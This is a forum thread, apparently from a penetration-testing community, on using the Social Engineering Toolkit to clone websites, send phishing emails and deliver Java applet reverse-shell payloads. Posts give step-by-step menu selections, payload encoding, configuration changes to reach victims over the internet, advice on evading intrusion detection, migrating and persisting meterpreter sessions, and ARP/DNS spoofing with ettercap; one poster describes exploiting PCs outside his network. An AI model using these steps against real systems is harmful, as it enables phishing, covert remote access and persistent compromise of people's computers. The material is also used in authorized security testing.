The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

[Utram]

A. You have permission from the ISP (They tend to frown on public exploitation)

If this were to be done between two consenting parties via WAN but the ISP, IPS and/or IDS do detect the signatures of flying shells and terminate them automatically by policy; then it would be sensible to encrypt or tunnel the connection, can metasploit perform such a task?

Sorry if this sounds a little "noobsih" I'm familiar with metasploit but only as far as the basics go.

[theprez98]

I think you meant SecManiac.com Blog - Comments on Building one badarse CUDA Cracking Server!

Semi-inside joke; I did in fact mean sacmaniac.com ;-)

[HAL9000]

OK Folks!!!

I used this method with my pc and I have modified the router to forward the port in order to use my local ip address to exploit the PCs outside my network.
I made a test and it works fine!!!

So now the question is how we can keep the connection alive when we are inside the remote pc?
I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

Thanks

[Utram]

So now the question is how we can keep the connection alive when we are inside the remote pc?
I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

Thanks

There are literally countless ways to preserve a connection after obtaining a shell. Check out chapter 11 in Metasploit Unleashed guide
Metasploit Unleashed - Mastering the Framework

[relik]

hi
I have had this working and gained full access to my XP sp2 box just great.
Tried to do it again many times - wont work this is what I am doing.:-
./set
select - 2 website vectors
select - 2 clone and setup fake website
select - 1 Java applet attack method
enter url www.etcetc.co
returns Payload name 98iywQNlF.exe (this time -diff each try)
select - 1 Windows Shell reverse TCP
select - 2 shikata_ga_nai
2 times
enter port 55555
linux/OSX = no
select - 1 single Email address
select - 1 Gmail
now it sends email and MSF fires up
started reverse handler on 192.168.1.3:55555 etc
Now on XP box firfox browser
email to my hotmail account recieved OK
enter http://192.168.1.3:55555
back in MSF = coomand shell session 1 opened (192.168.1.3:55555 -> 192.168.1.10:3547)
meantime XP browser waiting for 192.168.1.3
msf enter sessions -i 1 shows several lines and hangs in cookie list
have to abort the session.

in the BT4 /site/template directory the files index.html is the cloned website, and also the 98iywQNlF.exe file
any ideas please as it has worked the once only
many thanks

Heya there guy, your problem is your going to:

http://ip:55555

It will initiate the payload second stage downloader because your initiating a valid connection to the server. The port 55555 is only for the payload to return back to you. SET by default uses port 80 to setup the fake website, so you would browse http://ip instead, not http://ip:55555, if you need the SET web server to be on a different port, edit the config/set_config and edit the WEB_PORT=80 to something different.

I hope that helps!

ReL

REL1K: where can I find the source code of Java.class? I am not good at Java so decompiling is not useful to me. I just want to change the name of the Java Applet but I can't because SET comes with a pre-compiled class. Thanks..

I can work with you on changing that, send me a PM on IRC (rel1k)

Good post, what an excellent time-saving App.

I'm considering implementing the email aspect of this program into a pentest. But it doesn't bind when i type in my public IP, or will it automatically do that? This will be done through WAN so I'm going with the assumption that typing in only my local IP address will be insufficient.

Utram, by default SET binds to whatever interface is used to connect to the outbound internet (specifically google), if that is different from your externally facing interface, you can turn auto detect off through config/set_config, there is an AUTO_DETECT=ON flag that you change to AUTO_DETECT=OFF, once that occurs, you can manually set your listening IP address through that!

Hope that helps.

ReL

If this were to be done between two consenting parties via WAN but the ISP, IPS and/or IDS do detect the signatures of flying shells and terminate them automatically by policy; then it would be sensible to encrypt or tunnel the connection, can metasploit perform such a task?

Sorry if this sounds a little "noobsih" I'm familiar with metasploit but only as far as the basics go.

The payloads themselves are obfuscated through encoding, IDS/IPS shouldn't pick them up however if its a HIPS based solution, anything new that hasn't executed a socket connection back may be suspicious. I would recommend utilizing meterpreter as the communications back and forth are done via SSL.

OK Folks!!!

I used this method with my pc and I have modified the router to forward the port in order to use my local ip address to exploit the PCs outside my network.
I made a test and it works fine!!!

So now the question is how we can keep the connection alive when we are inside the remote pc?
I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

Thanks

What ends up happening (if i understand you right) is once the command shell or reverse meterpreter or whatever is initiated, its running under the same memory space and process as IEXPLORER.EXE, if the victim closes his or her browser, the thread is then terminated and hence the closing of the connection. I would recommend utilizing meterpreter in this instance because as soon as you get that connection, you can type "ps" look for something like explorer.exe or something that is a stable windows process, and type "migrate <process id>" this will allow you to migrate off of the iexplorer memory address space, and if the victim closes it, it will still remain open.

You can also use a persistent meterpreter instance where meterpreter will connect back on specific intervals if the connection is lost. Check out Metasploit Unleashed - Mastering the Framework, it has some info on getting a persistent meterpreter console. I also believe a ruby script was created to help aid with this now.

Hope that helps!

ReL

[lasi merum]

is it not work in windows xp sp3 because i try in my own computer and can not collect and don't have a session...
what's wrong ith me?

Heya there guy, your problem is your going to:

http://ip:55555

It will initiate the payload second stage downloader because your initiating a valid connection to the server. The port 55555 is only for the payload to return back to you. SET by default uses port 80 to setup the fake website, so you would browse http://ip instead, not http://ip:55555, if you need the SET web server to be on a different port, edit the config/set_config and edit the WEB_PORT=80 to something different.

I hope that helps!

ReL



I can work with you on changing that, send me a PM on IRC (rel1k)



Utram, by default SET binds to whatever interface is used to connect to the outbound internet (specifically google), if that is different from your externally facing interface, you can turn auto detect off through config/set_config, there is an AUTO_DETECT=ON flag that you change to AUTO_DETECT=OFF, once that occurs, you can manually set your listening IP address through that!

Hope that helps.

ReL



The payloads themselves are obfuscated through encoding, IDS/IPS shouldn't pick them up however if its a HIPS based solution, anything new that hasn't executed a socket connection back may be suspicious. I would recommend utilizing meterpreter as the communications back and forth are done via SSL.



What ends up happening (if i understand you right) is once the command shell or reverse meterpreter or whatever is initiated, its running under the same memory space and process as IEXPLORER.EXE, if the victim closes his or her browser, the thread is then terminated and hence the closing of the connection. I would recommend utilizing meterpreter in this instance because as soon as you get that connection, you can type "ps" look for something like explorer.exe or something that is a stable windows process, and type "migrate <process id>" this will allow you to migrate off of the iexplorer memory address space, and if the victim closes it, it will still remain open.

You can also use a persistent meterpreter instance where meterpreter will connect back on specific intervals if the connection is lost. Check out Metasploit Unleashed - Mastering the Framework, it has some info on getting a persistent meterpreter console. I also believe a ruby script was created to help aid with this now.

Hope that helps!

ReL

[Tablechukka]

Hi all,

First off, thanks for this great tutorial pureh@te. I have followed this and have managed to create a cloned site, and send an e-mail to my victim laptop (XP SP3), i click the link and the java applet is load. I want to try and take this a step further. I have now opened up ettercap selected both my victim machine and my router, and then ran ARP poising. I have also configured my dns.spoof (* A 10.1.1.3) to redirect all to my cloned site, this works but then the Java Applet does not load. Any ideas on how to fix this?

Many thanks in advance

[ootuoyetahi]

OK Folks!!!

I used this method with my pc and I have modified the router to forward the port in order to use my local ip address to exploit the PCs outside my network.
I made a test and it works fine!!!

So now the question is how we can keep the connection alive when we are inside the remote pc?
I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

Thanks

How did you get this to work. I forwarded all ports (80, 4444, 8080, and 8081) to my local IP and was still unable to get this to work. The problem is that the the source code in the cloned website points to a local ip - <applet width="1" height="1" code="Java.class" archive="Signed_Update.jar"><param name="WIN" value="http://192.168.1.3/fkKyej0bY.exe"><param name="MAC" value="http://192.168.1.3/mac.bin">

Over a WAN this obviously wont work. Is there a way this can be changed?

[purehate]

It will work fine, you need to add your public IP when creating the fake site.

[ootuoyetahi]

Ok I got it. I had to go into the SET config and disable auto detect IP.

Thanks,